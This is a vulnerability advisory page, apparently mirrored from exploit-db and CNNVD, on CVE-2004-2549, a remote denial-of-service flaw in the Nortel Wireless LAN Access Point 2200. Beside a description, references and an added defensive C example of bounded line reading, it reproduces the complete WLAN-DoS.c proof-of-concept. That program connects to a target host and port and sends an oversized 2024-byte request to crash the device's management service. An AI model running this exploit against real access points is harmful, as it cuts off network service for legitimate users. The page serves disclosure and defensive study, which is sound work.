Nortel Wireless LAN Access Point 2200 Series Remote Denial of Service Vulnerability

Vulnerability ID: 1107765    Vulnerability type: Boundary condition error
Published: 2004-03-02    Updated: 2006-01-24
CVE: CVE-2004-2549    CNNVD ID: CNNVD-200412-190
Platform: Hardware    CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/23786
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-190
|Vulnerability details
The Nortel Wireless LAN Access Point 2200 series are wireless access devices. The Nortel Wireless LAN Access Point 2200 series handles oversized network requests incorrectly, and a remote attacker can exploit this to carry out a denial-of-service attack against the device. The LAN AP 2200 permits arbitrary client-server communication and is managed by default over ports 23 (telnet) and 80 (HTTP). An oversized network request submitted to one of the access point's default administration services can crash the wireless access service, which then stops responding to other legitimate users.
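The record classifies the flaw as a boundary condition error: a management service accepting a request line longer than the buffer it was written for. The following is an added illustration of the defensive pattern, written for this page and not taken from the AP 2200 firmware or from the advisory's author; it assumes nothing about how the device actually parses its telnet or HTTP input. The reader enforces a maximum line length, drains the excess up to the newline so the stream stays in sync, and reports the oversized request so the caller can reject it instead of crashing or acting on a truncated prefix. The `demo_*` functions and their inputs (2024 filler bytes followed by newlines, the shape of the PoC below) are constructed for the example.

```c
/* bounded_line.c - added example: a length-bounded request-line reader.
 * Not the AP 2200 firmware; illustrates the boundary-check the advisory's
 * "boundary condition error" classification says was missing. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define MAX_LINE 256   /* largest administration command line we accept */

enum line_status { LINE_OK = 0, LINE_TOO_LONG = 1, LINE_INCOMPLETE = 2 };

/* Extracts one '\n'-terminated line from buf[*pos .. len) into out
 * (capacity cap >= 1, always NUL-terminated). An over-long line is
 * consumed through its newline, so the next call starts on the following
 * line, and LINE_TOO_LONG tells the caller to reject the request rather
 * than trust the truncated prefix. LINE_INCOMPLETE means no newline has
 * arrived yet (wait for more data, or close the session if the caller's
 * own receive buffer is full). */
enum line_status read_bounded_line(const char *buf, size_t len, size_t *pos,
                                   char *out, size_t cap)
{
    size_t n = 0;
    int truncated = 0;

    while (*pos < len) {
        char c = buf[(*pos)++];
        if (c == '\n') {
            out[n] = '\0';
            return truncated ? LINE_TOO_LONG : LINE_OK;
        }
        if (n + 1 < cap)
            out[n++] = c;        /* room left: store the byte */
        else
            truncated = 1;       /* buffer full: keep draining, stop storing */
    }
    out[n] = '\0';
    return LINE_INCOMPLETE;
}

/* Constructed oversized request: 2024 'A's then eight newlines. Returns the
 * status of the first line; *consumed receives the input bytes used. */
enum line_status demo_oversized(size_t *consumed)
{
    char req[2024 + 8];
    char line[MAX_LINE];
    size_t pos = 0;
    enum line_status st;

    memset(req, 'A', 2024);
    memcpy(req + 2024, "\n\n\n\n\n\n\n\n", 8);
    st = read_bounded_line(req, sizeof req, &pos, line, sizeof line);
    if (consumed)
        *consumed = pos;
    return st;
}

/* Constructed ordinary session: two commands back to back. Returns 1 when
 * both parse cleanly and the second is intact; the first is copied to out. */
int demo_normal(char *first, size_t cap)
{
    const char req[] = "show version\nexit\n";
    char second[MAX_LINE];
    size_t pos = 0;
    enum line_status a = read_bounded_line(req, sizeof req - 1, &pos, first, cap);
    enum line_status b = read_bounded_line(req, sizeof req - 1, &pos, second, sizeof second);
    return a == LINE_OK && b == LINE_OK && strcmp(second, "exit") == 0;
}

int main(void)
{
    char first[MAX_LINE];
    size_t used = 0;
    enum line_status st = demo_oversized(&used);

    printf("oversized request: status=%d, %zu bytes consumed\n", (int)st, used);
    printf("normal session ok=%d, first command=\"%s\"\n",
           demo_normal(first, sizeof first), first);
    return 0;
}
```

The key property is that rejection, not truncation, is the outcome: a service that silently shortens an oversized line may execute a command the client never sent, while one that reports `LINE_TOO_LONG` can close that session and keep answering everyone else.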
|Vulnerability EXP
source: http://www.securityfocus.com/bid/9787/info

Nortel Wireless LAN Access Point 2200 series appliances have been reported to be prone to a remote denial of service vulnerability. The issue is reported to present itself when a large network request is handled by one of the Wireless LAN Access Point default administration services. This will reportedly cause the Access Point Appliance Operating service to crash, effectively denying service to legitimate users.

/* WLAN-DoS.c
 *
 * Nortel Networks Wireless LAN Access Point 2200 DoS + PoC
 * discovered by Alex Hernandez.
 *
 * Copyright (C) 2004  Alex Hernandez.
 *
 * A successful attack on a vulnerable server can cause the AP
 * (Access Point) listener to fail and crash. The port 23 (telnet)
 * functionality cannot be restored until the listener is manually restarted.
 *
 * LAN AP 2200 permits client-server communication across any network.
 * LAN enables by default the port 23 (telnet) and port (80) for administering.
 * Debugging features are enabled by default, if LAN AP encounters such a request,
 * it will crash and no longer field AP requests from authorized clients.
 *
 * Simple lame code by
 *
 * -Mark Ludwik :Germany
 *
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* memset, memcpy, strlen */
#include <unistd.h>      /* sleep, close */
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/types.h>

/* 2024 filler bytes, eight newlines and a terminating NUL. The original
 * buffer was exactly 2024 bytes, so the memcpy below wrote past its end
 * and strlen() ran off the unterminated array. */
#define FILL_LEN 2024
#define TAIL     "\n\n\n\n\n\n\n\n"

int main(int argc, char *argv[]) {
 int sock;
 char explbuf[FILL_LEN + sizeof(TAIL)];
 struct sockaddr_in dest;
 struct hostent *he;

 if(argc < 3) {
  printf("\nWLAN NortelNetworks AP DoS exploit by Mark Ludwik\n\n");
  printf("Usage: WlanDoS [AP/Host] [port]\n\n");
  exit(-1);
 }

 if((he = gethostbyname(argv[1])) == NULL) {
  printf("Couldn't resolve %s!\n", argv[1]);
  exit(-1);
 }

 if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  perror("socket()");
  exit(-1);
 }

 printf("\nWLAN NortelNetworks AP DoS exploit by Mark Ludwik\n\n");

 memset(&dest, 0, sizeof(dest));
 dest.sin_addr = *((struct in_addr *)he->h_addr);
 dest.sin_port = htons(atoi(argv[2]));
 dest.sin_family = AF_INET;

 printf("[+] Exploit buffer.\n");
 memset(explbuf, 'A', FILL_LEN);
 memcpy(explbuf + FILL_LEN, TAIL, sizeof(TAIL));   /* sizeof includes the NUL */

 if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) {
  perror("connect()");
  exit(-1);
 }

 printf("[+] Connected...\n");
 printf("[+] Sending DoS attack...!\n");

 send(sock, explbuf, strlen(explbuf), 0);
 sleep(2);
 close(sock);
 printf("\n[+] Crash was successful !\n");
 return(0);
}
|References

Source: XF
Name: nortel-accesspoint-telnet-dos (15373)
Link: http://xforce.iss.net/xforce/xfdb/15373
Source: www116.nortelnetworks.com
Link: http://www116.nortelnetworks.com/docs/bvdoc/wlan/216109a.pdf
Source: BID
Name: 9787
Link: http://www.securityfocus.com/bid/9787
Source: OSVDB
Name: 4128
Link: http://www.osvdb.org/4128
Source: SECTRACK
Name: 1009294
Link: http://securitytracker.com/id?1009294
Source: SECUNIA
Name: 11034
Link: http://secunia.com/advisories/11034
Source: FULLDISC
Name: 20040301 Nortel Networks Wireless LAN Access Point 2200 DoS + PoC
Link: http://archives.neohapsis.com/archives/fulldisclosure/2004-03/0055.html
Source: NSFOCUS
Name: 6119
Link: http://www.nsfocus.net/vulndb/6119